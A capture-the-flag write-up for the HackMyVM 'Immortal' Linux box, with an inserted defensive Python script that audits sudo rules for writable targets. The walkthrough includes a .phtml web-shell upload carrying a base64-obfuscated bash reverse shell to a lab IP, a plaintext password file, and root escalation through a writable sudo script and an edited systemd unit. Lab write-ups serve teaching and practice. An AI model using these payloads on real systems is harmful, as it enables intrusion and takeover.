
HackMyVM-Immortal

450 words · 3 min read
Categories/Tags: Hackmyvm, Linux
Author: HYH
A technical enthusiast focused on cybersecurity, penetration testing and CTF challenges, who enjoys documenting hands-on experience, sharing tools and techniques, and is committed to continuous learning and growth.

Box Info

OS: Linux
Difficulty: Medium

Nmap

[root@kali] /home/kali/immportal  
❯ nmap 192.168.55.17 -sV -A -p- 

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.55.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0        0             504 Feb 27  2024 message.txt
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 e8:79:ad:8b:d1:a8:39:1b:ac:ed:52:ef:d0:22:0e:eb (RSA)
|   256 65:df:6d:1d:49:11:bd:f3:2f:fa:10:0c:3b:48:69:39 (ECDSA)
|_  256 f6:b7:bf:cf:a5:d5:1b:26:4e:13:08:31:07:d5:79:b1 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Password
|_http-server-header: Apache/2.4.56 (Debian)

Own www-data

The password for the web page turns out to be: santiago

After entering it, a new PHP page is revealed:

Message to all.
I'm glad you made it, I knew you would guess the password, it's the one we always used, although Boyras recommended us to stop using it because "it was in rockyou". 
By the way guys, you can still upload messages to the server from this new path -> upload_an_incredible_message.php
Saying goodbye very happy, David

That page allows uploading files to the **/chat** directory.

It also turns out that the .phtml extension bypasses the upload blacklist:

Content-Disposition: form-data; name="file"; filename="321.phtml"
Content-Type: text/plain

GIF89a
<?php system("printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41NS40LzQ0NDQgMD4mMSkgJg==|base64 -d|bash");?>

From here user.txt can be read directly.

Own drake

A password file is found:

www-data@Immortal:/home/drake/...$ ls -al
total 12
drwxr-xr-x 2 drake drake 4096 Feb 27  2024 .
drwxr-xr-x 4 drake drake 4096 Feb 29  2024 ..
-rw-r--r-- 1 drake drake  134 Feb 27  2024 pass.txt
www-data@Immortal:/home/drake/...$ cat pass.txt 
netflix : drake123
amazon : 123drake
shelldred : shell123dred (f4ns0nly)
system : kevcjnsgii
bank : myfavouritebank
nintendo : 123456

The "system" entry is drake's password.

Own eric

drake@Immortal:~/...$ sudo -l
Matching Defaults entries for drake on Immortal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User drake may run the following commands on Immortal:
    (eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py

Look at what the script contains:

drake@Immortal:~/...$ ls -al /opt/
total 16
drwxr-xr-x  2 root root 4096 Feb 28  2024 .
drwxr-xr-x 18 root root 4096 Feb 27  2024 ..
-rw-rw-rw- 1 root root  147 Feb 28  2024 immortal.py
-rw-r--r-- 1 root root   36 Feb 28  2024 immortal.txt
drake@Immortal:~/...$ cat /opt/immortal.py 
a = input(str("Do you want to be immortal: "))

if a.lower() == "yes" or a.lower() == "no":
   print("Bad answer")
else:
   print("Are you sure?")

Since the file is world-writable, its contents can be replaced:

drake@Immortal:/opt$ cat immortal.py 
import os

os.system("bash -p")
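The weakness exploited above is a sudo rule that runs an interpreter on a script other users can write. As a defender's check (an added example, not code from the writeup), the following Python audit parses `sudo -l` command lines, resolves the script an interpreter would execute, and flags scripts whose mode grants group or world write. The temporary directory, the helper.sh rule and the file contents are constructed for the demo.

```python
import os
import re
import stat
import tempfile
# Interpreters whose first argument is the script that really runs.
INTERPRETERS = {"python", "python3", "bash", "sh", "perl", "php"}
# One command line as printed by `sudo -l`: "(eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?:\w+:\s*)*(?P<cmd>.+)$")

def parse_rule(line):
    """Return (runas, argv) for one sudo command line, or None for other text."""
    m = RULE_RE.match(line)
    return (m.group("runas"), m.group("cmd").split()) if m else None

def script_target(argv):
    """For '<interpreter> <script> ...' return the script, otherwise the binary."""
    if os.path.basename(argv[0]) in INTERPRETERS and len(argv) > 1:
        return argv[1]
    return argv[0]

def writable_by_non_owner(path):
    # True when the group or world write bit is set (e.g. -rw-rw-rw-).
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(lines, root=""):
    """Return (runas, path, octal mode) for rules whose target others can write."""
    findings = []
    for line in lines:
        parsed = parse_rule(line)
        if not parsed:
            continue
        runas, argv = parsed
        target = script_target(argv)
        full = root + target  # `root` prefixes the absolute path so the demo can use a constructed tree
        if os.path.isfile(full) and writable_by_non_owner(full):
            findings.append((runas, target, oct(stat.S_IMODE(os.stat(full).st_mode))))
    return findings

def demo():
    """Constructed fixture: immortal.py is 0666 as on the box, helper.sh (hypothetical) is 0755."""
    root = tempfile.mkdtemp()
    os.makedirs(root + "/opt")
    for name, mode in (("immortal.py", 0o666), ("helper.sh", 0o755)):
        with open(root + "/opt/" + name, "w") as f:
            f.write("# placeholder\n")
        os.chmod(root + "/opt/" + name, mode)
    rules = [
        "    (eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py",
        "    (root) NOPASSWD: /bin/bash /opt/helper.sh",
        "    (root) NOPASSWD: /usr/bin/systemctl daemon-reload",
    ]
    return audit(rules, root=root)
```

Running `audit()` with `root=""` on real `sudo -l` output checks the live filesystem; only the 0666 immortal.py is reported in the demo.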

Root

eric@Immortal:~$ sudo -l
Matching Defaults entries for eric on Immortal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User eric may run the following commands on Immortal:
    (root) NOPASSWD: sudoedit /etc/systemd/system/immortal.service
    (root) NOPASSWD: /usr/bin/systemctl start immortal.service
    (root) NOPASSWD: /usr/bin/systemctl stop immortal.service
    (root) NOPASSWD: /usr/bin/systemctl enable immortal.service
    (root) NOPASSWD: /usr/bin/systemctl disable immortal.service
    (root) NOPASSWD: /usr/bin/systemctl daemon-reload

First use sudoedit to change the unit file's contents to:

[Unit]
Description=Immortal Service
After=network.target

[Service]
Type=oneshot
ExecStart=chmod u+s /bin/bash

[Install]
WantedBy=multi-user.target

Summary

Fairly simple, nothing more to say.
